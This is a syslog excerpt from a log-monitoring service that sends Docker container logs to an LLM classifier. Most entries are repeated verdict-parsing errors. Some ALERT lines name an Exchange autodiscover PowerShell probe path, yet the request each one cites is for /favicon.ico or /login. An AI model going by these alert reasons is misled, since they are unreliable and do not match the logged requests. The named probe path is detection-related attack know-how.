22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.977822 [watcher] Streaming logs for captain-captain.1.oqvny8g95v3neveijmxdmdgto (080568bcaf31) Mar 19 22:48:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:52.977624 [watcher] Streaming logs for captain-netdata-container (974270844dff) Mar 19 22:48:53 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:48:53.456645 [observer] LLM inference server connected Mar 19 22:49:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:22.976974 [observer] Pipeline: processed=5 pattern_hits=2 llm_calls=2 llm_errors=0 learned=0 Mar 19 22:49:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:22.977006 [observer] Patterns: hash=2 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=3 Mar 19 22:49:28 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:28.290826 [llm] Failed to parse 
verdict from: Mar 19 22:49:28 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:28.290866 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input Mar 19 22:49:28 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:28.290876 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:49:14.557232603Z 98.152.173.124 - - [19/Mar/2026:22:49:14 +0000] "api.admin.kovicloud.... Mar 19 22:49:33 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:33.551338 [llm] Failed to parse verdict from: Mar 19 22:49:33 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:33.551376 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: parsing verdict: unexpected end of JSON input Mar 19 22:49:33 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:33.551385 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-19T22:49:14.558106005Z 10.0.1.9 - - [19/Mar/2026:22:49:14 +0000] "GET / HTTP/1.0" 200 34020 ... Mar 19 22:49:44 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:44.380046 [llm] Failed to parse verdict from: Mar 19 22:49:44 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:44.380080 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input Mar 19 22:49:44 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:44.380089 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:49:17.151124992Z 98.152.173.124 - - [19/Mar/2026:22:49:17 +0000] "captain.admin.kovicl... 
Mar 19 22:49:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:50.010918 [llm] Failed to parse verdict from: Mar 19 22:49:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:50.010955 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: parsing verdict: unexpected end of JSON input Mar 19 22:49:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:50.010964 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-19T22:49:20.984517857Z 10.0.1.9 - - [19/Mar/2026:22:49:20 +0000] "GET / HTTP/1.0" 200 34020 ... Mar 19 22:49:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:52.976383 [observer] Pipeline: processed=8 pattern_hits=2 llm_calls=5 llm_errors=4 learned=0 Mar 19 22:49:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:52.976412 [observer] Patterns: hash=2 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=6 Mar 19 22:49:59 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:59.841489 [llm] Failed to parse verdict from: Mar 19 22:49:59 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:59.841535 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input Mar 19 22:49:59 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:49:59.841546 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:49:20.985007038Z 98.152.173.124 - - [19/Mar/2026:22:49:20 +0000] "api.admin.kovicloud.... 
Mar 19 22:50:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:50:22.980466 [observer] Pipeline: processed=16 pattern_hits=10 llm_calls=5 llm_errors=5 learned=0 Mar 19 22:50:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:50:22.980491 [observer] Patterns: hash=10 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=6 Mar 19 22:50:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:50:52.992998 [observer] Pipeline: processed=18 pattern_hits=12 llm_calls=5 llm_errors=5 learned=0 Mar 19 22:50:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:50:52.993024 [observer] Patterns: hash=12 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=6 Mar 19 22:51:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:51:22.978351 [observer] Pipeline: processed=22 pattern_hits=16 llm_calls=5 llm_errors=5 learned=0 Mar 19 22:51:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:51:22.978374 [observer] Patterns: hash=16 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=6 Mar 19 22:51:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:51:52.989486 [observer] Pipeline: processed=24 pattern_hits=18 llm_calls=5 llm_errors=5 learned=0 Mar 19 22:51:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:51:52.989525 [observer] Patterns: hash=18 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=6 Mar 19 22:52:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:52:22.976963 [observer] Pipeline: processed=28 pattern_hits=22 llm_calls=5 llm_errors=5 learned=0 Mar 19 22:52:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:52:22.976993 [observer] Patterns: hash=22 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=6 Mar 19 22:52:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:52:52.978618 [observer] Pipeline: processed=30 pattern_hits=24 llm_calls=5 llm_errors=5 learned=0 Mar 19 22:52:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:52:52.978643 [observer] Patterns: hash=24 prefix=0 regex=0 contains=0 deny=0 alert=0 
suppress=0 misses=6 Mar 19 22:53:10 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:10.318916 [llm] Failed to parse verdict from: Mar 19 22:53:10 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:10.318953 [analyzer] LLM error for docker:captain-netdata-container: parsing verdict: unexpected end of JSON input Mar 19 22:53:10 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:10.318963 [LLM_ERROR] Source=docker:captain-netdata-container Line=2026-03-19T22:52:56.677226540Z 2026-03-19 22:52:56: netdata INFO : MAIN : Creating new data and jou... Mar 19 22:53:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:22.976606 [observer] Pipeline: processed=36 pattern_hits=28 llm_calls=7 llm_errors=6 learned=0 Mar 19 22:53:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:22.976637 [observer] Patterns: hash=28 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=8 Mar 19 22:53:24 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:24.168430 [llm] Failed to parse verdict from: Mar 19 22:53:24 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:24.168470 [analyzer] LLM error for docker:captain-netdata-container: parsing verdict: unexpected end of JSON input Mar 19 22:53:24 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:24.168482 [LLM_ERROR] Source=docker:captain-netdata-container Line=2026-03-19T22:52:56.681517796Z 2026-03-19 22:52:56: netdata INFO : MAIN : Created data file "/var/c... Mar 19 22:53:38 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:38.597274 [llm] Failed to parse verdict from: Mar 19 22:53:38 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:38.597312 [analyzer] LLM error for docker:captain-netdata-container: parsing verdict: unexpected end of JSON input Mar 19 22:53:38 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:38.597321 [LLM_ERROR] Source=docker:captain-netdata-container Line=2026-03-19T22:52:56.682665133Z 2026-03-19 22:52:56: netdata INFO : MAIN : Created journal file "/va... 
Mar 19 22:53:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:52.978630 [observer] Pipeline: processed=39 pattern_hits=30 llm_calls=8 llm_errors=8 learned=0 Mar 19 22:53:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:53:52.978655 [observer] Patterns: hash=30 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=9 Mar 19 22:54:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:54:22.990842 [observer] Pipeline: processed=41 pattern_hits=32 llm_calls=8 llm_errors=8 learned=0 Mar 19 22:54:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:54:22.990870 [observer] Patterns: hash=32 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=9 Mar 19 22:54:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:54:52.974959 [observer] Pipeline: processed=45 pattern_hits=36 llm_calls=8 llm_errors=8 learned=0 Mar 19 22:54:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:54:52.974987 [observer] Patterns: hash=36 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=9 Mar 19 22:55:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:55:22.977149 [observer] Pipeline: processed=49 pattern_hits=40 llm_calls=8 llm_errors=8 learned=0 Mar 19 22:55:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:55:22.977196 [observer] Patterns: hash=40 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=9 Mar 19 22:55:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:55:52.975774 [observer] Pipeline: processed=53 pattern_hits=44 llm_calls=8 llm_errors=8 learned=0 Mar 19 22:55:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:55:52.975798 [observer] Patterns: hash=44 prefix=0 regex=0 contains=0 deny=0 alert=0 suppress=0 misses=9 Mar 19 22:56:08 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:56:08.330781 [llm] Failed to parse verdict from: Mar 19 22:56:08 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:56:08.330817 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input Mar 19 
22:56:08 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:56:08.330826 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:55:53.168546820Z 66.132.172.110 - - [19/Mar/2026:22:55:53 +0000] "54.200.221.0" "GET /... Mar 19 22:56:21 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:56:21.877907 [llm] Failed to parse verdict from: Mar 19 22:56:21 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:56:21.877942 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input Mar 19 22:56:21 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:56:21.877952 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:55:54.756417913Z 2026/03/19 22:55:54 [error] 422#422: *741982 open() "/usr/share/nginx... Mar 19 22:56:21 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:56:21.878000 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-19T22:55:54.756588180Z 66.132.172.110 - - [19/Mar/2026:22:55:54 +0000] "54.200.221.0" "GET /favicon.ico HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censy... 
Mar 19 22:56:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:56:22.976364 [observer] Pipeline: processed=58 pattern_hits=47 llm_calls=10 llm_errors=10 learned=0 Mar 19 22:56:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:56:22.976390 [observer] Patterns: hash=47 prefix=0 regex=0 contains=0 deny=1 alert=0 suppress=0 misses=11 Mar 19 22:56:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:56:52.975119 [observer] Pipeline: processed=62 pattern_hits=51 llm_calls=10 llm_errors=10 learned=0 Mar 19 22:56:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:56:52.975148 [observer] Patterns: hash=51 prefix=0 regex=0 contains=0 deny=1 alert=0 suppress=0 misses=11 Mar 19 22:57:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:57:22.975994 [observer] Pipeline: processed=64 pattern_hits=53 llm_calls=10 llm_errors=10 learned=0 Mar 19 22:57:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:57:22.976023 [observer] Patterns: hash=53 prefix=0 regex=0 contains=0 deny=1 alert=0 suppress=0 misses=11 Mar 19 22:57:44 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:57:44.585704 [llm] Failed to parse verdict from: Mar 19 22:57:44 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:57:44.585740 [analyzer] LLM error for docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp: parsing verdict: unexpected end of JSON input Mar 19 22:57:44 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:57:44.585748 [LLM_ERROR] Source=docker:srv-captain--api.1.qsgm0aq8qbclp93xxluoswmpp Line=2026-03-19T22:57:29.360581888Z 10.0.1.9 - - [19/Mar/2026:22:57:29 +0000] "GET / HTTP/1.0" 200 34020 ... 
Mar 19 22:57:44 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:57:44.741698 [llm] Failed to parse verdict from: Mar 19 22:57:44 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:57:44.741734 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input Mar 19 22:57:44 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:57:44.741743 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:57:29.360414317Z 178.156.254.40 - - [19/Mar/2026:22:57:29 +0000] "api.admin.kovicloud.... Mar 19 22:57:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:57:52.975794 [observer] Pipeline: processed=68 pattern_hits=55 llm_calls=12 llm_errors=12 learned=0 Mar 19 22:57:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:57:52.975821 [observer] Patterns: hash=55 prefix=0 regex=0 contains=0 deny=1 alert=0 suppress=0 misses=13 Mar 19 22:58:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:58:22.975077 [observer] Pipeline: processed=72 pattern_hits=59 llm_calls=12 llm_errors=12 learned=0 Mar 19 22:58:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:58:22.975102 [observer] Patterns: hash=59 prefix=0 regex=0 contains=0 deny=1 alert=0 suppress=0 misses=13 Mar 19 22:58:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:58:50.177638 [llm] Failed to parse verdict from: Mar 19 22:58:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:58:50.177740 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input Mar 19 22:58:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:58:50.177753 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T22:58:32.891039298Z 2026/03/19 22:58:32 [error] 422#422: *742010 open() "/usr/share/nginx... 
Mar 19 22:58:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:58:50.177802 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-19T22:58:32.891128707Z 66.132.172.110 - - [19/Mar/2026:22:58:32 +0000] "54.200.221.0" "GET /login HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)...
Mar 19 22:58:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:58:52.975331 [observer] Pipeline: processed=76 pattern_hits=62 llm_calls=13 llm_errors=13 learned=0
Mar 19 22:58:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:58:52.975351 [observer] Patterns: hash=62 prefix=0 regex=0 contains=0 deny=2 alert=0 suppress=0 misses=14
Mar 19 22:59:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:59:22.976027 [observer] Pipeline: processed=80 pattern_hits=66 llm_calls=13 llm_errors=13 learned=0
Mar 19 22:59:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:59:22.976050 [observer] Patterns: hash=66 prefix=0 regex=0 contains=0 deny=2 alert=0 suppress=0 misses=14
Mar 19 22:59:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:59:52.975486 [observer] Pipeline: processed=82 pattern_hits=68 llm_calls=13 llm_errors=13 learned=0
Mar 19 22:59:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 22:59:52.975512 [observer] Patterns: hash=68 prefix=0 regex=0 contains=0 deny=2 alert=0 suppress=0 misses=14
Mar 19 23:00:17 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:17.385510 [llm] Failed to parse verdict from:
Mar 19 23:00:17 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:17.385654 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:00:17 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:17.385669 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:00:01.159974117Z 167.94.138.200 - - [19/Mar/2026:23:00:01 +0000] "54.200.221.0" "GET /...
Mar 19 23:00:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:22.976406 [observer] Pipeline: processed=86 pattern_hits=70 llm_calls=15 llm_errors=14 learned=0
Mar 19 23:00:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:22.976434 [observer] Patterns: hash=70 prefix=0 regex=0 contains=0 deny=2 alert=0 suppress=0 misses=16
Mar 19 23:00:33 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:33.923037 [llm] Failed to parse verdict from:
Mar 19 23:00:33 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:33.923079 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:00:33 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:33.923088 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:00:01.566272536Z 2026/03/19 23:00:01 [error] 422#422: *742028 open() "/usr/share/nginx...
Mar 19 23:00:33 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:33.923135 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-19T23:00:01.566449139Z 167.94.138.200 - - [19/Mar/2026:23:00:01 +0000] "54.200.221.0" "GET /favicon.ico HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censy...
Mar 19 23:00:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:50.443396 [llm] Failed to parse verdict from:
Mar 19 23:00:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:50.443443 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:00:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:50.443453 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:00:10.139441969Z 2026/03/19 23:00:10 [error] 422#422: *742033 open() "/usr/share/nginx...
Mar 19 23:00:50 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:50.443672 [ALERT] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Reason=HTTP request to /autodiscover/autodiscover.json?@zdi/Powershell with 404 indicates probing for Exchange/autodiscover PowerShell payload (common scanning behavior, seen with zgrab/automation). Line=2026-03-19T23:00:10.139481386Z 167.94.138.200 - - [19/Mar/2026:23:00:10 +0000] "54.200.221.0" "GET /login HTTP/1.1" 404 2401 "-" "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)...
Mar 19 23:00:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:52.976855 [observer] Pipeline: processed=95 pattern_hits=78 llm_calls=16 llm_errors=16 learned=0
Mar 19 23:00:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:00:52.976881 [observer] Patterns: hash=78 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=17
Mar 19 23:01:13 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:01:13.851636 [llm] Failed to parse verdict from:
Mar 19 23:01:13 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:01:13.851677 [analyzer] LLM error for docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo: parsing verdict: unexpected end of JSON input
Mar 19 23:01:13 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:01:13.851685 [LLM_ERROR] Source=docker:captain-nginx.1.hjfscqq05nqtarebk0ps5xsgo Line=2026-03-19T23:00:57.335934532Z 93.174.93.12 - - [19/Mar/2026:23:00:57 +0000] "_" "\x16\x03\x02\x01o\...
Mar 19 23:01:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:01:22.976957 [observer] Pipeline: processed=98 pattern_hits=80 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:01:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:01:22.976981 [observer] Patterns: hash=80 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:01:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:01:52.975793 [observer] Pipeline: processed=102 pattern_hits=84 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:01:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:01:52.975819 [observer] Patterns: hash=84 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:02:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:02:22.975007 [observer] Pipeline: processed=104 pattern_hits=86 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:02:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:02:22.975034 [observer] Patterns: hash=86 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:02:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:02:52.976372 [observer] Pipeline: processed=108 pattern_hits=90 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:02:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:02:52.976402 [observer] Patterns: hash=90 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:03:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:03:22.975018 [observer] Pipeline: processed=110 pattern_hits=92 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:03:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:03:22.975041 [observer] Patterns: hash=92 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:03:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:03:52.975027 [observer] Pipeline: processed=114 pattern_hits=96 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:03:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:03:52.975054 [observer] Patterns: hash=96 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:04:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:04:22.976118 [observer] Pipeline: processed=116 pattern_hits=98 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:04:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:04:22.976143 [observer] Patterns: hash=98 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:04:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:04:52.976003 [observer] Pipeline: processed=118 pattern_hits=100 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:04:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:04:52.976028 [observer] Patterns: hash=100 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:05:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:05:22.974925 [observer] Pipeline: processed=122 pattern_hits=104 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:05:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:05:22.975460 [observer] Patterns: hash=104 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:05:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:05:52.977009 [observer] Pipeline: processed=126 pattern_hits=108 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:05:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:05:52.977035 [observer] Patterns: hash=108 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:06:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:06:22.975052 [observer] Pipeline: processed=130 pattern_hits=112 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:06:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:06:22.975080 [observer] Patterns: hash=112 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:06:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:06:52.978347 [observer] Pipeline: processed=132 pattern_hits=114 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:06:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:06:52.978374 [observer] Patterns: hash=114 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:07:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:07:22.975768 [observer] Pipeline: processed=136 pattern_hits=118 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:07:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:07:22.975790 [observer] Patterns: hash=118 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:07:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:07:52.974818 [observer] Pipeline: processed=138 pattern_hits=120 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:07:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:07:52.975036 [observer] Patterns: hash=120 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:08:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:08:22.994841 [observer] Pipeline: processed=140 pattern_hits=122 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:08:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:08:22.994868 [observer] Patterns: hash=122 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:08:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:08:52.974956 [observer] Pipeline: processed=144 pattern_hits=126 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:08:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:08:52.974980 [observer] Patterns: hash=126 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:09:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:09:22.987585 [observer] Pipeline: processed=146 pattern_hits=128 llm_calls=17 llm_errors=17 learned=0
Mar 19 23:09:22 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:09:22.987608 [observer] Patterns: hash=128 prefix=0 regex=0 contains=0 deny=4 alert=0 suppress=0 misses=18
Mar 19 23:09:52 ip-172-26-12-110 observer[1562837]: 2026/03/19 23:09:52.978665 [observer] Pipeline: processed=150 pattern_hits=132 llm_calls=17 llm_errors=17 learned=0
